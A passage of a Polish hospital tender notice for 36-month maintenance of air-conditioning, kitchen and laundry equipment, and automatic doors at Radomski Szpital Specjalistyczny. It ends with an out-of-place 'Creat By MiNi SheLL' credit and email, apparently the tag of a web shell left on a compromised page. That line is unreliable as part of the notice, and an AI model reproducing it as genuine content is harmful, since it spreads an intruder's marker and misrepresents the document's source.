21.		O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia - U.P.S.	Lennox GHM 09 NLA
22.		O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia - stymulatory	Tadiran GXL200HD
23.		O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia - echo	Lennox GHM12N
24.		O/Anestezjologii i Intensywnej Terapii	Tadiran GFL-S 150H
25.		Kaplica	Lennox HM18NO
26.		O/Chirurgii Ogólnej (sale R)	Tadiran GXL200HD
27.		O/Chirurgii Ogólnej	Tadiran TFE 11
28.		O/Urologii z Pracownią Litotrypsji	Tadiran GXL200HD
29.		O/Urologii z Odcinkiem Zabiegowym 1 Dnia i Pracownią Litotrypsji	Carrier
30.		Pracownia RTG ul. Lekarska 4	Lennox GHN 12 NLA
31.		Sekretariat ul. Lekarska 4	Fujitsu AOY12RSCJ
32.		Blok Operacyjny -Ginekologiczny	Tadiran GXL200HD
33.		O/Ginekologiczno-Położniczy - II p.	Lennox IHM 18 NO
34.		O/Ginekologiczno-Położniczy - III p.	Lennox GHM 24 NO
35.		Poradnia Chirurgii Ogólnej 	Lennox GHN 09 NLA
36.		Poradnia Gruźlicy, Chorób Płuc i Alergii Oddechowej	Lennox GHM12H
37.		Poradnia Chorób Piersi i profilaktyki Onkologicznej ul. Lekarska	Lennox GHM12N
38.		Apteka Szpitalna	Hundaj
39.		Bufet (Dział Żywienia)	Lennox   GHM12N
40.			Lennox   HM30NO
41.		Zakład Diagnostyki Obrazowej	Fujtsu   AQY09
42.
	Zakład Diagnostyki Obrazowej USG	Mitsubishi
43. 	O/Obserwacyjno-Zakaźny z odcinkiem 1 Dnia Leczenia Chorób Wątroby	Fujtsu   AQY09
44.	Blok Operacyjny Chirurgiczny z Centralna Sterylizatornią	Daikin  3MK350E1V1B
45		Daikin  3MK350E1V1B
46		Daikin  3MK350E1V1B
47		Daikin  3MK350E1V1B
48	Dział Informatyki (serwery)	Mitsubiski  MO2-GE35VA
49	Dział Informatyki (serwery)	Mitsubiski  PUH2P125
50	Dział Informatyki (serwery)	Mitsubiski  PUH2P125
51	SOR z Izbą Przyjęć (ups)	Lennox   GHM12N
52	O/Kardiologiczny z Odcinkiem 1 Dnia Leczenia Stanów Nagłych w Chorobach Układu Krążenia - Ordynator	Urlich
53	Poradnia Ortopedyczna	Lennox   HM18N
54	O/Okulistyki z Odcinkiem Zabiegowym Jednego Dnia	Lennox   HM18N
55	Zakład Patomorfologii -1p.	Fujtsu  
56	O/Dializ z Odcinkiem Nefrologii - Gabinet lekarski	Tadiran
57	O/Chirurgii Naczyniowej z Odcinkiem Zabiegowym 1 Dnia	1 szt. ( brak tablicy znamionowej)
58	Laboratorium Mikrobiologii	Samsung FH070EAV1
59	Laboratorium Mikrobiologii	Samsung AQ18TSBN/X

c)	Chłodnie i lodówki
Uwaga: przedmiotowi umowy nie podlegają urządzenia specjalistyczne np. medyczne.

II.	Opis czynności konserwacyjno-eksploatacyjnych
1. Wykonywanie wszelkich prac związanych z eksploatacją i konserwacją w ruchu ciągłym instalacji 
i urządzeń wentylacji mechanicznej i klimatyzacji wyszczególnionych w przedmiocie zamówienia wraz z ich organizacją i nadzorem, według zasad określonych w instrukcjach i dokumentacji techniczno-ruchowej, przepisach branżowych i normach, rozporządzeniach oraz ustawach:
- ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156 poz. 1118 
z późn. zm.), 
- ustaw z dnia 10 kwietnia 1997 r. Prawo energetyczne (tekst jedn. Dz. U. z 2006 r. Nr 89 poz. 625 
z późn. zm.), 
- ustawa z dnia 21 grudnia 2000 r. o dozorze technicznym (tekst jedn. Dz. U. z 2000 r. Nr 122 poz. 1321 z późn. zm.), 
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2008 r. Nr 25 poz. 150 z późn. zm.), 
- i ich aktach wykonawczych,
- i innych obowiązujących aktach prawnych.
W szczególności na obowiązujący zakres prac składać się będą:
a)	okresowe (w terminach określonych instrukcjami i przepisami branżowymi) oraz bieżące (uzależnione od pracy urządzeń i potrzeb) oględziny, przeglądy i sprawdzenia,
b)	pełnienie dyżurów stałych w godzinach 7.00 - 15.00 w dni robocze na terenie Zamawiającego oraz zapewnienie całodobowej dyspozycyjności we wszystkie dni w przypadku awarii
c)	próby, sprawdzenia i regulacje eksploatacyjne
d)	okresowa wymiana filtrów
e)	konserwacje, naprawy,  prace remontowe wynikające z normalnego zużycia części 
i podzespołów
f)	lokalizacja i zabezpieczanie awarii (niezwłoczne) i ich usuwanie w uzgodnieniu 
z Zamawiającym 
g)	bieżąca realizacja zgłoszeń, usuwanie usterek, wymiana uszkodzonych 
i wyeksploatowanych elementów instalacji i urządzeń
h)	prowadzenie dokumentacji eksploatacyjnej
i)	obsługa rewizji UDT
j)	nadzór i organizacja pracy pracowników eksploatacji
k)	wydawanie orzeczeń o stanie technicznym
l)	montaż splitów, kurtyn powietrznych itp.
2. Wykonawca zapewni całodobową obsługę eksploatacyjną ( dyspozycyjność w ruchu ciągłym) wraz z nadzorem oraz regularne okresowe przeglądy i regulacje zgodnie z obowiązującymi przepisami 
i instrukcjami obsługi i eksploatacji urządzeń.
3. Zamawiający zaleca aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej przedmiotu wykonania usługi ( po dokonanej wizji lokalnej Wykonawca otrzyma potwierdzenie odbycia wizji lokalnej podpisane przez Kierownika Działu Technicznego lub głównego Energetyka R Sz. S.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.73.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> KONSERWACJA URZĄDZEŃ KUCHENNYCH , PRALNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie urządzeń kuchennych, pralniczych będących na wyposażeniu Radomskiego Szpitala Specjalistycznego:
- urządzenia kuchenne i pralnicze ( lok. - kuchnia główna, bar, kuchnia rehabilitacja, oddziały, szwalnia i sortownia)- kuchnie, taborety i trzony gazowe, kotły warzelne parowe, gazowe oraz zmywarki, maszyny gastronomiczne (kotły elektryczno- gazowe 3szt., kuchnia gazowa 4-palnikowa 4szt., kuchnia gazowa 6-palnikowa 2 szt., kuchenki elektryczne 2 szt., taboret gazowy 3 szt., patelnie elektryczne 4 szt., piekarnik elektryczny 2 szt., kotły parowe 8 szt., kociołki elektryczne uchylne 3 szt., zmywarka  do naczyń 1 szt., maszyna wieloczynnościowa z przystawkami 1 szt., krajalnica do pieczywa 1 szt., maszyna do mięsa Wilk 1 szt., obieraczka do ziemniaków 2 szt., jarzyniarka 2 szt., krajalnica do żywności 2 szt., robot kuchenny 1 szt., kuchnia mikrofalowa 1 szt., frytkownica 1 szt., ekspres do kawy 1 szt.) , pralnica, suszarka, magiel, wirówka ( w części wodnej), zmywarki 
z oddziałów (szt.19) myjnie basenów z oddziałów (23 szt.)

II. Opis czynności eksploatacyjnych
1. Wykonywanie wszelkich prac związanych z eksploatacją i konserwacją w ruchu ciągłym instalacji
 i urządzeń kuchennych, pralniczych wyszczególnionych w przedmiocie zamówienia wraz z ich organizacją i nadzorem, według zasad określonych w instrukcjach i dokumentacji techniczno-ruchowej, przepisach branżowych i normach, rozporządzeniach oraz ustawach:
- ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156 poz. 1118 
z późn. zm.), 
- ustaw z dnia 10 kwietnia 1997 r. Prawo energetyczne (tekst jedn. Dz. U. z 2006 r. Nr 89 poz. 625 
z późn. zm.), 
- ustawa z dnia 21 grudnia 2000 r. o dozorze technicznym (tekst jedn. Dz. U. z 2000 r. Nr 122 poz. 1321 z późn. zm.), 
- ustawą z dnia 27 kwietnia 2001 r. Prawo ochrony środowiska (tekst jedn. Dz. U. z 2008 r. Nr 25 poz. 150 z późn. zm.), 
- i ich aktach wykonawczych,
- i innych obowiązujących aktach prawnych.

W szczególności na obowiązujący zakres prac składać się będą;
a) okresowe (w terminach określonych instrukcjami i przepisami branżowymi) oraz bieżące (uzależnione od pracy urządzeń i potrzeb) oględziny, przeglądy i sprawdzenia,
b) pełnienie dyżurów stałych w godzinach 7.00 - 15.00 w dni robocze na terenie Zamawiającego oraz zapewnienie całodobowej dyspozycyjności we wszystkie dni w przypadku awarii
c) próby, sprawdzenia i regulacje eksploatacyjne
d) konserwacje, naprawy,  prace remontowe wynikające z normalnego zużycia części i podzespołów
e) lokalizacja i zabezpieczanie awarii (niezwłoczne) i ich usuwanie w uzgodnieniu z Zamawiającym 
f) bieżąca realizacja zgłoszeń, usuwanie usterek, wymiana uszkodzonych i wyeksploatowanych elementów instalacji i urządzeń
g) prowadzenie dokumentacji eksploatacyjnej
h) obsługa rewizji UDT
i) nadzór i organizacja pracy pracowników eksploatacji
j) wydawanie orzeczeń o stanie technicznym
k) pomiary szczelności gazu
2. Wykonawca zapewni całodobową obsługę eksploatacyjną ( dyspozycyjność w ruchu ciągłym) wraz z nadzorem oraz regularne okresowe przeglądy i regulacje zgodnie z obowiązującymi przepisami 
i instrukcjami obsługi i eksploatacji urządzeń.
3. Zamawiający zaleca aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej przedmiotu wykonania usługi ( po dokonanej wizji lokalnej Wykonawca otrzyma potwierdzenie odbycia wizji lokalnej podpisane przez Kierownika Działu Technicznego lub głównego Energetyka R Sz. S.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.72.00.00-8, 50.53.12.00-8, 50.53.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> KONSERWACJA DRZWI I BRAM AUTOMATYCZNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> I. Ogólny opis przedmiotu zamówienia
Przedmiotem zamówienia są wszelkie czynności zapewniające prawidłowe funkcjonowanie w ruchu ciągłym drzwi i bram automatycznych oraz rogatek zewnętrznych w obiektach Szpitala:
Rogatki, bramy i drzwi automatyczne:
- Budynek Główny wejście Główne (x2)
- Szpitalny Oddział Ratunkowy z Izbą Przyjęć (x8)
- Poradnia Ortopedyczna (x2)
- Blok Operacyjny Chirurgiczny (x10)
- O/Ginekologiczno - Położniczy nowy (x8)
- rogatki (x3)

II. Opis czynności eksplotacyjnych
1. Wykonywanie wszelkich prac związanych z eksploatacją i konserwacją w ruchu ciągłym drzwi 
i bram automatycznych wyszczególnionych w przedmiocie zmówienia wraz z ich organizacją 
i nadzorem według zasad określonych w instrukcjach i dokumentacji techniczno-ruchowej, przepisach branżowych i normach, rozporządzeniach oraz ustawach:
- ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jedn. Dz. U. z 2006 r. Nr 156 poz. 1118 
z późn. zm.), 
- ustaw z dnia 10 kwietnia 1997 r. Prawo energetyczne (tekst jedn. Dz. U. z 2006 r. Nr 89 poz. 625 
z późn. zm.), 
- i ich aktach wykonawczych,
- i innych obowiązujących aktach prawnych.

W szczególności na obowiązujący zakres prac składać się będą;
a) okresowe (w terminach określonych instrukcjami i przepisami branżowymi) oraz bieżące (uzależnione od pracy urządzeń i potrzeb) oględziny, przeglądy i sprawdzenia,
b) zapewnienie całodobowej dyspozycyjności we wszystkie dni w przypadku awarii
c) próby, sprawdzenia i regulacje eksploatacyjne
d) konserwacje, naprawy,  prace remontowe wynikające z normalnego zużycia części 
i podzespołów
e) lokalizacja i zabezpieczanie awarii (niezwłoczne) i ich usuwanie w uzgodnieniu z Zamawiającym 
f) bieżąca realizacja zgłoszeń, usuwanie usterek, wymiana uszkodzonych i wyeksploatowanych elementów instalacji i urządzeń
g) prowadzenie dokumentacji eksploatacyjnej
h) nadzór i organizacja pracy pracowników eksploatacji
i) wydawanie orzeczeń o stanie technicznym
j) okresowa wymiana filtrów
2. Wykonawca zapewni całodobową obsługę eksploatacyjną ( dyspozycyjność w ruchu ciągłym) wraz z nadzorem oraz regularne okresowe przeglądy i regulacje zgodnie z obowiązującymi przepisami 
i instrukcjami obsługi i eksploatacji urządzeń.
3. Zamawiający zaleca aby Wykonawca przed złożeniem oferty dokonał wizji lokalnej przedmiotu wykonania usługi ( po dokonanej wizji lokalnej Wykonawca otrzyma potwierdzenie odbycia wizji lokalnej podpisane przez Kierownika Działu Technicznego lub głównego Energetyka R Sz. S.).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.71.00.00-5, 50.71.20.00-9, 50.71.10.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 36.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com